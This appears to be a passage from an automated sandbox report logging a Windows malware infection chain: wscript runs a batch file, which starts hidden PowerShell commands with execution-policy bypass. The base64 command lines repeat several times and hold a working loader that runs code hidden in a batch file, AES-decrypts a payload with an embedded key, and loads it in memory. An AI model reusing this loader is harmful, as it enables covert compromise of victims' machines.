Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICA